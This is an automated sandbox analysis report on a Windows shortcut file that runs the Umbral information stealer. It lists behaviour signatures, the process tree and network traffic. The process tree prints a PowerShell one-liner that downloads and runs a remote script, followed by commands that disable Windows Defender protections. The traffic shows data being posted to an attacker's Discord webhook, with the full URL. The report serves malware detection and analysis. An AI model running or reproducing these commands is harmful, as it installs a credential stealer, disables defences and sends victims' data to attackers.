Analysis

  • max time kernel
    37s
  • max time network
    42s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250313-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20250313-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    23/03/2025, 14:56 UTC

General

  • Target

    1231321312.lnk

  • Size

    2KB

  • MD5

    a83ed03220cbc79bcbcaae9a57d0b95a

  • SHA1

    062d88505a421b491c8614ccff1d8fdd34453e18

  • SHA256

    c30599a71b6129c75b93e7b508cc307928df2677fe1b00357547481662522033

  • SHA512

    97f7b63aa0435cbe3fb597f3a18941d0697c053ff75ccfdfae55f2e0f70afde85e6ef82e0c90077dcbc933247b8ac568f1fd28a7b3cc1f0eb1af9640f409a349

Malware Config

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Umbral family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    PowerShell Invoke-WebRequest.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely a geofence check.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials and similar data.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine the installed video card.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\1231321312.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:6000
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Invoke-Expression (Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/download_and_run.ps1' -UseBasicParsing).Content"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2912
      • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:5908
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4880
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4452
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" os get Caption
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4080
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1268
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          4⤵
          PID:4352
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:2876
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          4⤵
          • Detects videocard installed
          PID:1872

Network

    • flag-us
      DNS
      raw.githubusercontent.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      raw.githubusercontent.com
      IN A
      Response
      raw.githubusercontent.com
      IN A
      185.199.110.133
      raw.githubusercontent.com
      IN A
      185.199.108.133
      raw.githubusercontent.com
      IN A
      185.199.111.133
      raw.githubusercontent.com
      IN A
      185.199.109.133
    • flag-us
      GET
      https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/download_and_run.ps1
      powershell.exe
      Remote address:
      185.199.110.133:443
      Request
      GET /sigmanip/reallogs123fr/refs/heads/main/download_and_run.ps1 HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
      Host: raw.githubusercontent.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Connection: keep-alive
      Content-Length: 235
      Cache-Control: max-age=300
      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
      Content-Type: text/plain; charset=utf-8
      ETag: "2ffb20924b8165e3bb0d1adeb4c308a05358721c09521f03eb9517e013c63729"
      Strict-Transport-Security: max-age=31536000
      X-Content-Type-Options: nosniff
      X-Frame-Options: deny
      X-XSS-Protection: 1; mode=block
      X-GitHub-Request-Id: 9BA4:2CF82C:258870:51385F:67E0209A
      Accept-Ranges: bytes
      Date: Sun, 23 Mar 2025 14:56:48 GMT
      Via: 1.1 varnish
      X-Served-By: cache-lcy-eglc8600093-LCY
      X-Cache: HIT
      X-Cache-Hits: 0
      X-Timer: S1742741809.901862,VS0,VE1
      Vary: Authorization,Accept-Encoding,Origin
      Access-Control-Allow-Origin: *
      Cross-Origin-Resource-Policy: cross-origin
      X-Fastly-Request-ID: 9c9648a2f0ae72915cc89930488506e761657acb
      Expires: Sun, 23 Mar 2025 15:01:48 GMT
      Source-Age: 150
    • flag-us
      GET
      https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/Umbral.exe
      powershell.exe
      Remote address:
      185.199.110.133:443
      Request
      GET /sigmanip/reallogs123fr/refs/heads/main/Umbral.exe HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
      Host: raw.githubusercontent.com
      Response
      HTTP/1.1 200 OK
      Connection: keep-alive
      Content-Length: 232448
      Cache-Control: max-age=300
      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
      Content-Type: application/octet-stream
      ETag: "3bb1be44a471407bf874d31bb67f7ee3c0cabbbcd1ed58d49011f4e4de216d2d"
      Strict-Transport-Security: max-age=31536000
      X-Content-Type-Options: nosniff
      X-Frame-Options: deny
      X-XSS-Protection: 1; mode=block
      X-GitHub-Request-Id: 637A:23CF78:2DC55B:635D7F:67E01D79
      Accept-Ranges: bytes
      Date: Sun, 23 Mar 2025 14:56:49 GMT
      Via: 1.1 varnish
      X-Served-By: cache-lcy-eglc8600093-LCY
      X-Cache: HIT
      X-Cache-Hits: 0
      X-Timer: S1742741810.559584,VS0,VE1
      Vary: Authorization,Accept-Encoding,Origin
      Access-Control-Allow-Origin: *
      Cross-Origin-Resource-Policy: cross-origin
      X-Fastly-Request-ID: 0d864f50d8286eea9cffb22ca8bb9dc7a9704aa4
      Expires: Sun, 23 Mar 2025 15:01:49 GMT
      Source-Age: 150
    • flag-us
      DNS
      github.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      github.com
      IN A
      Response
      github.com
      IN A
      20.26.156.215
    • flag-us
      DNS
      g.bing.com
      Remote address:
      8.8.8.8:53
      Request
      g.bing.com
      IN A
      Response
      g.bing.com
      IN CNAME
      g-bing-com.ax-0001.ax-msedge.net
      g-bing-com.ax-0001.ax-msedge.net
      IN CNAME
      ax-0001.ax-msedge.net
      ax-0001.ax-msedge.net
      IN A
      150.171.28.10
      ax-0001.ax-msedge.net
      IN A
      150.171.27.10
    • flag-gb
      GET
      https://github.com/sigmanip/reallogs123fr/raw/refs/heads/main/Umbral.exe
      powershell.exe
      Remote address:
      20.26.156.215:443
      Request
      GET /sigmanip/reallogs123fr/raw/refs/heads/main/Umbral.exe HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
      Host: github.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 302 Found
      Server: GitHub.com
      Date: Sun, 23 Mar 2025 14:56:49 GMT
      Content-Type: text/html; charset=utf-8
      Content-Length: 0
      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
      Access-Control-Allow-Origin:
      Location: https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/Umbral.exe
      Cache-Control: no-cache
      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
      X-Frame-Options: deny
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 0
      Referrer-Policy: no-referrer-when-downgrade
      Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com 
api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/
      X-GitHub-Request-Id: BDA3:3CE317:6520A7:844034:67E02131
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid=
      Remote address:
      150.171.28.10:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MUID=330F6805DF6D6E631F907DBDDE4A6FEE; domain=.bing.com; expires=Fri, 17-Apr-2026 14:56:49 GMT; path=/; SameSite=None; Secure; Priority=High;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 33E55781042B494D99A3808D6B7C3977 Ref B: LON04EDGE0716 Ref C: 2025-03-23T14:56:49Z
      date: Sun, 23 Mar 2025 14:56:49 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid=
      Remote address:
      150.171.28.10:443
      Request
      GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=330F6805DF6D6E631F907DBDDE4A6FEE
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MSPTC=wAMDP41-EczGmC7q26xDIXPST9Ix4lD3bPeZIxoSgYE; domain=.bing.com; expires=Fri, 17-Apr-2026 14:56:49 GMT; path=/; Partitioned; secure; SameSite=None
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: F6363355ED994B3BA50A7F35557CB21E Ref B: LON04EDGE0716 Ref C: 2025-03-23T14:56:49Z
      date: Sun, 23 Mar 2025 14:56:49 GMT
    • flag-us
      GET
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid=
      Remote address:
      150.171.28.10:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=330F6805DF6D6E631F907DBDDE4A6FEE; MSPTC=wAMDP41-EczGmC7q26xDIXPST9Ix4lD3bPeZIxoSgYE
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 2B5505CA640648F98BC3A9990ED96987 Ref B: LON04EDGE0716 Ref C: 2025-03-23T14:56:49Z
      date: Sun, 23 Mar 2025 14:56:49 GMT
    • flag-us
      DNS
      gstatic.com
      Umbral.exe
      Remote address:
      8.8.8.8:53
      Request
      gstatic.com
      IN A
      Response
      gstatic.com
      IN A
      172.217.16.227
    • flag-gb
      GET
      https://gstatic.com/generate_204
      Umbral.exe
      Remote address:
      172.217.16.227:443
      Request
      GET /generate_204 HTTP/1.1
      Host: gstatic.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 204 No Content
      Content-Length: 0
      Cross-Origin-Resource-Policy: cross-origin
      Date: Sun, 23 Mar 2025 14:56:52 GMT
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • flag-us
      DNS
      tse1.mm.bing.net
      Remote address:
      8.8.8.8:53
      Request
      tse1.mm.bing.net
      IN A
      Response
      tse1.mm.bing.net
      IN CNAME
      mm-mm.bing.net.trafficmanager.net
      mm-mm.bing.net.trafficmanager.net
      IN CNAME
      ax-0001.ax-msedge.net
      ax-0001.ax-msedge.net
      IN A
      150.171.27.10
      ax-0001.ax-msedge.net
      IN A
      150.171.28.10
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239339388267_1DFP94UDBWNO6AJBT&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239339388267_1DFP94UDBWNO6AJBT&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 439648
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: CEC2D33B7E064FEA83147BFA364B4571 Ref B: LON04EDGE0718 Ref C: 2025-03-23T14:56:52Z
      date: Sun, 23 Mar 2025 14:56:51 GMT
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239340418585_1K319IV1QEN3HBC0V&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239340418585_1K319IV1QEN3HBC0V&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 443925
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: E989363938AD43718405CECC9CE0F242 Ref B: LON04EDGE0718 Ref C: 2025-03-23T14:56:52Z
      date: Sun, 23 Mar 2025 14:56:51 GMT
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239339388266_1J4KSPP65Y4N6T5S1&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239339388266_1J4KSPP65Y4N6T5S1&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 440528
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: EDCE895C95F542C6B338DB5C59982ED7 Ref B: LON04EDGE0718 Ref C: 2025-03-23T14:56:52Z
      date: Sun, 23 Mar 2025 14:56:51 GMT
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239359748018_19NTYSZS66ZTQP557&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239359748018_19NTYSZS66ZTQP557&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 561393
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: AE1EC42FA31D44D8B94F7A01F0F2420C Ref B: LON04EDGE0718 Ref C: 2025-03-23T14:56:52Z
      date: Sun, 23 Mar 2025 14:56:51 GMT
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239359748010_1Q8ARU8JIAMP3E64P&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239359748010_1Q8ARU8JIAMP3E64P&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 629947
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 6E1DAB3E6D7F4445B4DE756D98F7F3F6 Ref B: LON04EDGE0718 Ref C: 2025-03-23T14:56:52Z
      date: Sun, 23 Mar 2025 14:56:51 GMT
    • flag-us
      GET
      https://tse1.mm.bing.net/th?id=OADD2.10239340418586_15W93I98EWXDJY7GO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239340418586_15W93I98EWXDJY7GO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 488476
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 19B654A1241941A0A24B5A4C7D3C0780 Ref B: LON04EDGE0718 Ref C: 2025-03-23T14:56:54Z
      date: Sun, 23 Mar 2025 14:56:53 GMT
    • flag-us
      DNS
      ip-api.com
      Umbral.exe
      Remote address:
      8.8.8.8:53
      Request
      ip-api.com
      IN A
      Response
      ip-api.com
      IN A
      208.95.112.1
    • flag-us
      GET
      http://ip-api.com/json/?fields=225545
      Umbral.exe
      Remote address:
      208.95.112.1:80
      Request
      GET /json/?fields=225545 HTTP/1.1
      Host: ip-api.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Sun, 23 Mar 2025 14:56:53 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 191
      Access-Control-Allow-Origin: *
      X-Ttl: 5
      X-Rl: 43
    • flag-us
      DNS
      discord.com
      Umbral.exe
      Remote address:
      8.8.8.8:53
      Request
      discord.com
      IN A
      Response
      discord.com
      IN A
      162.159.135.232
      discord.com
      IN A
      162.159.128.233
      discord.com
      IN A
      162.159.136.232
      discord.com
      IN A
      162.159.137.232
      discord.com
      IN A
      162.159.138.232
    • flag-us
      POST
      https://discord.com/api/webhooks/1241809686664183896/9rYevcDZOTZa6fKNaplkhwVZjaOO4TEwZsMBjf_9Ri8SBoZYG-Pj3yYhDD-n3_oh-_yK
      Umbral.exe
      Remote address:
      162.159.135.232:443
      Request
      POST /api/webhooks/1241809686664183896/9rYevcDZOTZa6fKNaplkhwVZjaOO4TEwZsMBjf_9Ri8SBoZYG-Pj3yYhDD-n3_oh-_yK HTTP/1.1
      Accept: application/json
      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
      Content-Type: application/json; charset=utf-8
      Host: discord.com
      Content-Length: 969
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      Date: Sun, 23 Mar 2025 14:56:54 GMT
      Content-Type: application/json
      Content-Length: 45
      Connection: keep-alive
      Cache-Control: public, max-age=3600, s-maxage=3600
